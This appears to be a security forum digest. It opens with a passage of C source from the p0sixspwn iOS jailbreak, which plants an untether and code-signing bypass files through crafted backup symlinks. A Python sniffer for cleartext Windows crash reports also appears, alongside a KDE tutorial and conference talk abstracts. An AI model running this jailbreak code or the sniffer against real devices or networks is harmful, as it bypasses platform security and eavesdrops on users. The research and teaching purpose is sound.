4) != 0) { ERROR("Could not add tar"); return -1; } if (backup_symlink(backup, "MediaDomain", "Media/Recordings/.haxx/bin/tar", "/private/var/untether/tar", 0, 0, 4) != 0) { ERROR("Failed to symlink tar!\n"); return -1; } if (backup_symlink(backup, "MediaDomain", "Media/Recordings/.haxx/usr/libexec/dirhelper", "/private/var/untether/dirhelper", 0, 0, 4) != 0) { ERROR("Failed to symlink dirhelper!\n"); return -1; } if (backup_add_file_from_path(backup, "MediaDomain", "payload/common/install.deb", "Media/Recordings/.haxx/var/untether/install.deb", 0100755, 0, 0, 4) != 0) { ERROR("Could not add dirhelper"); return -1; } if (backup_add_file_from_path(backup, "MediaDomain", "payload/common/dirhelper", "Media/Recordings/.haxx/var/untether/dirhelper", 0100755, 0, 0, 4) != 0) { ERROR("Could not add dirhelper"); return -1; } if (backup_add_file_from_path(backup, "MediaDomain", jb_path, "Media/Recordings/.haxx/var/untether/untether", 0100755, 0, 0, 4) != 0) { ERROR("Could not add jb"); return -1; } if (backup_add_file_from_path(backup, "MediaDomain", amfi_path, "Media/Recordings/.haxx/var/untether/_.dylib", 0100644, 0, 0, 4) != 0) { ERROR("Could not add amfi"); return -1; } if (backup_add_file_from_path(backup, "MediaDomain", "payload/Cydia.tar", "Media/Recordings/.haxx/var/untether/Cydia.tar", 0100644, 0, 0, 4) != 0) { ERROR("Could not add cydia"); return -1; } } } idevicebackup2(5, rargv2); backup_free(backup); cb("Finalizing...\n", 90); DEBUG("Installed jailbreak, fixing up directories.\n"); rmdir_recursive_afc(afc, "/Recordings", 1); 
/********************************************************/ /* * move back any remaining dirs via AFC */ /********************************************************/ is_jailbroken = 1; fix: DEBUG("Recovering files...\n", 80); if (!afc) { lockdown = lockdown_open(device); port = 0; if (lockdown_start_service(lockdown, "com.apple.afc", &port) != 0) { WARN("Could not start AFC service. Aborting.\n"); lockdown_free(lockdown); goto leave; } lockdown_free(lockdown); lockdown = NULL; desc.port = port; afc_client_new(device->client, &desc, &afc); if (!afc) { WARN("Could not connect to AFC. Aborting.\n"); goto leave; } } rmdir_recursive(backup_dir); WARN("Recovery complete.\n"); if (is_jailbroken) { cb("Your device is now jailbroken, it is now preparing to reboot automatically.\n", 100); WARN("Your device is now jailbroken, it is now preparing to reboot automatically.\n"); /* * Reboot device automatically. */ lockdown = lockdown_open(device); diagnostics_relay_client_t diagnostics_client = NULL; uint16_t diag_port = 0; lockdown_start_service(lockdown, "com.apple.mobile.diagnostics_relay", &diag_port); desc.port = diag_port; if (diagnostics_relay_client_new(device->client, &desc, &diagnostics_client) == DIAGNOSTICS_RELAY_E_SUCCESS) { diagnostics_relay_restart(diagnostics_client, 0); } } else { cb("Your device has encountered an error during the jailbreak process, unplug it and try again.\n", 100); WARN("Your device has encountered an error during the jailbreak process, unplug it and try again.\n"); } leave: afc_client_free(afc); afc = NULL; device_free(device); device = NULL; return 0; } Sursa completa: https://github.com/p0sixspwn/p0sixspwn
18. [h=1]How to Install KDE SC 4.12 on Ubuntu 13.10 and 12.04 LTS[/h] December 31st, 2013, 04:40 GMT · By Marius Nestor The following tutorial will teach both existing and new Kubuntu/Ubuntu users how to install or upgrade the brand-new and featureful KDE SC 4.12 desktop environment on their existing and healthy Ubuntu/Kubuntu 13.10 (Saucy Salamander) and 12.04 LTS (Precise Pangolin) operating systems. After yet another six months of hard work, the beautiful KDE Software Compilation reached version 4.12 on December 18, 2013, bringing improvements to its main components: KDE Plasma Workspaces, KDE Applications and KDE Platform. As expected, the Kubuntu developers packaged the KDE Software Compilation's new version for the Kubuntu 13.10 and 12.04 LTS releases, via an easy to use PPA. However, the packages also work well on other Ubuntu 13.10 and 12.04 LTS based Linux operating systems, so the following guide will teach you how to install KDE SC 4.12 on top of your existing Ubuntu installation. Step 1 – Add KDE SC 4.12 repositories Open a Terminal window by hitting the CTRL+ALT+T key combination on your keyboard. Copy and paste the following command in the Terminal window: sudo add-apt-repository ppa:kubuntu-ppa/backports Hit Enter, and type your password when asked, and hit the Enter key again. See the next screenshot for details, but do not close the Terminal window yet. Proceed to the next step! Adding the KDE SC 4.12 PPA in Ubuntu 13.10 Now, you need to update the entire package database on your system for the newly added PPA packages with the KDE SC 4.12 release. Copy and paste the following command: sudo apt-get update Hit Enter and wait for it to index the new packages. When it's done, execute the following command (copy and paste) to install KDE SC 4.12 or update your existing KDE installation to the 4.12 version: sudo apt-get install kubuntu-desktop Once again, hit the Enter key when asked if you want to install all the KDE SC 4.12 packages, and wait for them to be downloaded and installed, a process that will take some time, depending on your network connection and computer specs. Installing KDE SC 4.12 in Ubuntu 13.10 When all the KDE SC 4.12 packages have been installed, close the Terminal window and reboot your computer. Immediately after the boot screen, Ubuntu users will notice that the boot splash screen has been replaced with the Kubuntu one, as well as the login screen. At the login screen, select your username, click the button that says "Ubuntu" and select the KDE Plasma Workspace entry. See the screenshot below for details. The login screen of Kubuntu 13.10 Type your password and hit Enter to login. After a few seconds, the KDE SC 4.12 desktop environment will be loaded... Enjoy! KDE SC 4.12 on Ubuntu 13.10 Uninstalling KDE SC 4.12 (optional step) In case you don't like KDE SC 4.12 and you want to remove it from your system and return to your previous desktop environment, open a Terminal window with the CTRL+ALT+T key combination, access this link and copy/paste that huge command in the terminal window, hit Enter to execute it and again when asked if you want to remove the packages.
After that, type the following commands to remove the rest of the KDE packages from your system (one by one, hitting Enter after each one):

sudo apt-get autoremove
sudo apt-get install ppa-purge
sudo ppa-purge ppa:kubuntu-ppa/backports
sudo apt-get update
sudo apt-get dist-upgrade
sudo gedit /etc/lightdm/lightdm.conf

Now replace "kde-plasma" with "ubuntu" under the 'user-session=' entry, and "lightdm-kde-greeter" with "unity-greeter" under the 'greeter-session=' entry. Save the file and close it. Reboot your computer and everything should be like it was before installing KDE.

Do not hesitate to use our commenting system below in case you encounter any issues with the tutorial.

Sursa: How to Install KDE SC 4.12 on Ubuntu 13.10 and 12.04 LTS
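As a reference for the lightdm.conf edit described in the uninstall step above, the relevant section should end up looking roughly like the excerpt below. This is only a sketch: the [SeatDefaults] section name and the surrounding entries are assumptions based on a stock Ubuntu 12.04/13.10 LightDM configuration and may differ on your system.

[SeatDefaults]
# was: greeter-session=lightdm-kde-greeter
greeter-session=unity-greeter
# was: user-session=kde-plasma
user-session=ubuntu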
  19. Why the NSA is happy when Windows crashes

The latest Snowden leaks via Der Spiegel contain an interesting snippet: the NSA intercepts Windows crash reports en route from the user to Microsoft. “An internal presentation suggests it is NSA’s powerful XKeyscore spying tool that is used to fish these crash reports out of the massive sea of Internet traffic.”

The NSA presentation even makes a joke of it, adapting the Microsoft error message to say, “This information may be intercepted by a foreign SIGINT system…” Frankly, I find the NSA sense of humour troubling rather than amusing.

These error messages, says Spiegel, provide “valuable insights into problems with a targeted person’s computer and, thus, information on security holes that might be exploitable for planting malware or spyware on the unwitting victim’s computer.” Really?

Yes, really. Websense coincidentally (?) published a report on this very problem yesterday, and will be presenting further findings at RSA 2014 in San Francisco (assuming anybody is still going). It says:

One troubling thing we observed is Windows Error Reporting (a.k.a. Dr. Watson) predominantly sends out its crash logs in the clear. These error logs could ultimately allow eavesdroppers to map out vulnerable endpoints and gain a foothold within the network for more advanced penetration.

Here’s more on why that’s a concern:

80 percent of all network connected PCs use it – that’s more than one billion endpoints worldwide
Dr. Watson reports information that hackers commonly use to find and exploit weak systems, such as OS, service pack and update versions
Crashes are especially useful for attackers as they may pinpoint a new exploitable code flaw for a zero-day attack
Information is also sent for common system events like plugging in a USB device

Let’s see how long it takes for Microsoft to respond and start encrypting its error messages. Then the only problem will be in persuading us that it hasn’t simultaneously given the NSA the key…

Sursa: Why the NSA is happy when Windows crashes | Kevin Townsend
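To illustrate the cleartext-reporting issue described above, here is a minimal sketch of a passive sniffer that flags what look like unencrypted Windows Error Reporting uploads. It assumes Python with scapy installed and that the reports travel over plain HTTP to the well-known watson.microsoft.com endpoints (the host names are an assumption for the sake of the example); it only illustrates the eavesdropping idea and is not a reproduction of XKeyscore or of the Websense research.

from scapy.all import IP, Raw, TCP, sniff

# Host names commonly associated with Windows Error Reporting uploads.
# These are assumptions for illustration; real deployments may use others.
WER_HOSTS = (b"watson.microsoft.com", b"watson.telemetry.microsoft.com")

def flag_wer(pkt):
    """Print the source address of cleartext HTTP traffic that looks like a WER upload."""
    if pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt.haslayer(IP):
        payload = bytes(pkt[Raw].load)
        if any(host in payload for host in WER_HOSTS):
            print("possible Dr. Watson report from %s" % pkt[IP].src)

if __name__ == "__main__":
    # Needs root privileges; only watches plain HTTP (port 80), i.e. the
    # unencrypted case the Websense report is concerned about.
    sniff(filter="tcp port 80", prn=flag_wer, store=0)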
  20. Defcon 21 - Hacking Driverless Vehicles

Description: Are driverless vehicles ripe for the hacking? Autonomous and unmanned systems are already patrolling our skies and oceans and being tested on our streets and highways. All trends indicate these systems are at an inflection point that will show them rapidly becoming commonplace. It is therefore a salient time for a discussion of the capabilities and potential vulnerabilities of these systems.

This session will be an informative and light-hearted look at the current state of civil driverless vehicles and what hackers or miscreants might do to mess with them. Topics covered will include common sensors, decision profiles and their potential failure modes that could be exploited. With this talk Zoz aims both to inspire unmanned vehicle fans to think about robustness to adversarial and malicious scenarios, and to give the paranoid false hope of resisting the robot revolution. He will also present details of how students can get involved in the ultimate sports events for robot hacking, the autonomous vehicle competitions.

Zoz is a robotics interface designer and rapid prototyping specialist. He is a co-founder of Cannytrophic Design in Boston and CTO of BlueSky in San Francisco. As co-host of the Discovery Channel show 'Prototype This!' he pioneered urban pizza delivery with robotic vehicles, including the first autonomous crossing of an active highway bridge in the USA, and airborne delivery of life preservers at sea from an autonomous aircraft. He also hosts the annual AUVSI Foundation student autonomous robot competitions such as Roboboat and Robosub.

For More Information please visit: https://www.defcon.org/html/defcon-21/dc-21-speakers.html

Sursa: Defcon 21 - Hacking Driverless Vehicles
  21. [h=1]Triggering Deep Vulnerabilities Using Symbolic Execution [30c3][/h]

Triggering Deep Vulnerabilities Using Symbolic Execution
Deep program analysis without the headache

Symbolic Execution (SE) is a powerful way to analyze programs. Instead of using concrete data values, SE uses symbolic values to evaluate a large set of parallel program paths at once. A drawback of many systems is that they need source code access and only scale to a few lines of code. This talk explains how SE and binary analysis can be used to (i) reverse-engineer components of binary-only applications and (ii) construct specific concrete input that triggers a given condition deep inside the application (think of defining an error condition and having the SE engine construct the input to the application that triggers the error).

Analysis and reverse engineering of binary programs is cumbersome. Consider the problem that we have a given interesting (error) condition inside the program that we want to trigger. How can we generate a specific input to the program that, during the execution of the program, will trigger the condition? In this talk we use a combination of binary analysis techniques that recover high-level control-flow and data-flow information from a binary-only application and Symbolic Execution (SE) to automate the analysis of such problems. Existing SE tools have often been used to achieve high coverage across all code paths in an application to find implementation bugs. We use SE for a different purpose: given a vulnerability condition hidden deep inside the application, what is the input that triggers that condition?

We tackle the given problem in three major steps: (i) gathering information about the binary, (ii) analyzing the information flow and control flow of the binary, and (iii) using symbolic execution to generate a specific input example that triggers the specified condition. During the information gathering process we define the interesting condition and use regular analysis techniques to set up later stages. In the information-flow and control-flow analysis we use a given sample input to collect a complete execution trace of the application, which is then parsed into a graph that dissects the computation of the application into individual components. The last step uses fuzzBall, our open-source SE engine, to compute specific vulnerability-triggering inputs for the identified components.

To evaluate our technique we will show several examples using real programs, demonstrating how we can use specific vulnerability conditions to automatically generate input that triggers them. In addition, we will show how our SE engine can be used for other interesting analyses on binary-only applications. Our tools are available as open source and we invite other hackers to join in on this project.

Speaker: gannimo
EventID: 5224
Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC]
Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany
Language: english
Begin: Fri, 12/27/2013
Lizenz: CC-by
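As a toy illustration of the core idea behind the talk above (and only that — fuzzBall works on binaries and derives such constraints automatically), the sketch below uses the Python bindings of the z3 SMT solver to model a small input transformation symbolically and asks the solver for a concrete input that reaches a chosen error branch. The target function, constants and variable names are made up for the example.

from z3 import BitVec, Solver, sat

# Toy target whose error branch we want to trigger:
#
#   void target(unsigned int x) {
#       unsigned int y = (x ^ 0xdeadbeef) * 3;
#       if (y == 0x0badf00d)
#           error();   /* the "deep" condition */
#   }

x = BitVec("x", 32)            # symbolic stand-in for the 32-bit input
y = (x ^ 0xDEADBEEF) * 3       # symbolic execution of the data flow

s = Solver()
s.add(y == 0x0BADF00D)         # path constraint describing the error branch

if s.check() == sat:
    model = s.model()
    print("input that triggers the condition: 0x%08x" % model[x].as_long())
else:
    print("the error branch is unreachable")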
  22. [h=1]Reverse engineering of CHIASMUS from GSTOOL [30c3][/h]

Reverse engineering of CHIASMUS from GSTOOL
It hurts.

We reverse-engineered one implementation of the non-public CHIASMUS cipher designed by the German Federal Office for Information Security (Bundesamt für Sicherheit in der Informationstechnik, short BSI). This did not only give us some insight into the cipher, but also uncovered serious implementation issues in GSTOOL which allow attackers to crack files encrypted with the GSTOOL encryption function with very little effort.

In the dark ages of digital cryptography, when ciphers were considered export-controlled munitions and AES was not yet standardized, the German Federal Office for Information Security (Bundesamt für Sicherheit in der Informationstechnik, short BSI) decided to invent their own ciphers: CHIASMUS for software implementations and LIBELLE, which would be kept secret and only implemented in hardware.

CHIASMUS is not publicly documented. It is implemented in a software tool of the same name, released by the BSI, which is only available where there is a public interest in its use. However, the GSTOOL, a database application for security audit management also released by the BSI, contains an encryption feature using the CHIASMUS block cipher, and is freely available. This software was developed by a third party, Steria Mummert Consulting, and apparently was not properly reviewed.

We disassembled and analyzed the GSTOOL to obtain the specification for the encrypted files (and thus the CHIASMUS cipher itself), but we got more than we bargained for. While the cipher itself appears to be pretty secure, the implementation is a collection of rookie mistakes and a great example of what can (and will) go wrong if you ask people with little understanding of cryptography to build cryptographic software and don't verify their results.

We invite you to enjoy this thriller full of historic backgrounds, non-public public announcements, legal threats, weapons-grade stupidity, and a very simple solution for complex cryptographic problems. Facepalm with us on the two-year-long hunt for the elusive security patch! Have a look at the (not-so-secret-anymore) CHIASMUS block cipher! Learn why you should not build your own crypto tools unless you really know what you are doing, even if you use a known algorithm. And what happens when government contractors attempt to do so. And then attempt to fix it.

(Note: Since this is an implementation issue, the stand-alone Chiasmus software tool is not affected by this issue.)

Speaker: Jan Schejbal
EventID: 5307
Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC]
Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany
Language: english
Begin: Fri, 12/27/2013
Lizenz: CC-by
  23. [h=1]10 Years of Fun with Embedded Devices [30c3][/h]

10 Years of Fun with Embedded Devices
How OpenWrt evolved from a WRT54G firmware into a universal embedded Linux OS

A review of the 10-year history of the OpenWrt project, current events, and upcoming developments.

This year we are celebrating ten years of OpenWrt. A long time has passed and a lot has happened since people first started hacking on devices like the WRT54G. Both the hardware and the software landscape have completely changed since then. In this talk we would like to take the chance, together with the audience, to look back on how the OpenWrt distribution evolved over time and how it has changed its goals, its processes and its software stack. We will show examples of the current state of the art, invite guests on stage, and display things to come. And in general, celebrate that 10 years have passed and that many more are to come.

The talk will start by looking back into the ancient history of OpenWrt - how it all got started - continue to the present time with an overview of current and recent developments, and then finish with an outlook onto future changes. During the talk we will look at the politics of what we have learned, what we think is broken in the CPE market, and how OpenWrt can help to change this.

OpenWrt has, over the course of the past 10 years, created a territory of its own, a territory situated in a landscape crisscrossed by relations, friction and interconnections. It is a journey that on its way created a universal embedded Linux operating system. OpenWrt is one of many islands in the Net which thrives by giving away its work to friends, associates and all those many people we don't know. All this is a good reason to celebrate, and the talk will finish with beer, exotic drinks and more fun to come.

Speaker: nbd
EventID: 5497
Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC]
Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany
Language: english
Begin: Fri, 12/27/2013
Lizenz: CC-by
  24. [h=1]An introduction to Firmware Analysis [30c3][/h]

An introduction to Firmware Analysis
Techniques - Tools - Tricks

This talk gives an introduction to firmware analysis: it starts with how to retrieve the binary, e.g. get a plain file from the manufacturer, extract it from an executable or a memory device, or even sniff it out of an update process or internal CPU memory, which can be really tricky. After that it introduces the necessary tools, gives tips on how to detect the processor architecture, and explains some more advanced analysis techniques, including how to figure out the offsets where the firmware is loaded to, and how to start the investigation.

The talk focuses on the different steps to be taken to acquire and analyze the firmware of an embedded device, especially without knowing anything about the processor architecture in use. Frequently datasheets are not available or do not name any details about the processor or System on Chip (SoC) used.

First the prerequisites are shown: knowledge about the device under investigation, the ability to read assembly language, and the tools of the trade for acquisition and analysis.

The question "How do I get the firmware out of device X?" makes up the next big chapter: from easy to hard we pass through the different kinds of storage systems and locations a firmware can be stored in, the different ways the firmware gets transferred onto the device, and which tools we can use to retrieve the firmware from where it resides.

The next step is to analyze the gathered data. Is it compressed in any way? For which of the various processor architectures out there was it compiled? Once we have successfully figured out the CPU type and found a matching disassembler, where do we start to analyze the code? Often we have to find out the offset the firmware is loaded to in order to get easy-to-analyze disassembler output. A technique to identify these offsets will be shown.

The last chapter covers the modifications we can apply to the firmware, and what types of checksum mechanisms are known to be used by the device or the firmware itself to check the integrity of the code.

Speaker: Stefan Widmann
EventID: 5477
Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC]
Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany
Language: english
Begin: Fri, 12/27/2013
Lizenz: CC-by
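As a flavour of the load-offset problem mentioned in the abstract above, the following sketch implements one well-known heuristic (similar in spirit to the various "basefind" scripts, not the specific technique from the talk): collect the file offsets of printable strings, collect every aligned 32-bit little-endian word in the image, and score candidate base addresses by how many words would then point at a string. The word size, endianness, alignment, search range and step are all assumptions for the example, and the brute-force loop is slow on large images.

import re
import struct
import sys
from collections import Counter

def string_offsets(data, min_len=8):
    """File offsets of printable ASCII runs that pointers are likely to reference."""
    return {m.start() for m in re.finditer(rb"[ -~]{%d,}" % min_len, data)}

def word_counts(data):
    """Multiset of every aligned 32-bit little-endian word in the image."""
    return Counter(struct.unpack_from("<I", data, off)[0]
                   for off in range(0, len(data) - 3, 4))

def guess_base(data, step=0x1000, max_base=0x08000000):
    """Return (base, score) for the candidate load address with the most pointer/string hits."""
    strings = string_offsets(data)
    words = word_counts(data)
    best_base, best_score = 0, 0
    for base in range(0, max_base, step):
        score = sum(words[base + s] for s in strings)
        if score > best_score:
            best_base, best_score = base, score
    return best_base, best_score

if __name__ == "__main__":
    with open(sys.argv[1], "rb") as f:
        image = f.read()
    base, score = guess_base(image)
    print("best guess for the load address: 0x%08x (%d pointer/string hits)" % (base, score))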
  25. [h=1]Hardening hardware and choosing a #goodBIOS [30c3][/h]

Hardening hardware and choosing a #goodBIOS
Clean boot every boot - rejecting persistence of malicious software and tripping up the evil maid

A commodity laptop is analyzed to identify exposed attack surfaces and is then secured on both the hardware and the firmware level against permanent modifications by malicious software as well as quick drive-by hardware attacks by evil maids, ensuring that the machine always powers up to a known good state and significantly raising the bar for an attacker who wants to use the machine against its owner.

Commodity computers by design include attack vectors that allow malicious software and attackers who gain brief physical access, so-called evil maids, to take full control over the machine without the owner ever noticing. The presentation briefly enumerates well-known attacks such as remote DMA over IEEE 1394/FireWire, BIOS bootkits, AMT and closed-source operating system updates to arrive at a problem statement, and moves on in search of solutions which can block the attacks completely or at least hinder them from becoming persistent, starting a layer below them all: with the schematic of a laptop mainboard.

A few relatively simple hardware modifications are identified which, together with the coreboot #goodBIOS firmware, prevent two entire classes of attacks. The result is a machine which always powers up in a known good state and which must be under attacker control for 20 minutes in order to be compromised, rather than just 20 seconds.

In closing, the presentation starts a discussion about what we can do to address this problem, which exists in every single computer on the market, on a larger scale.

Speaker: Peter Stuge
EventID: 5529
Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC]
Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany
Language: english
Begin: Fri, 12/27/2013
Lizenz: CC-by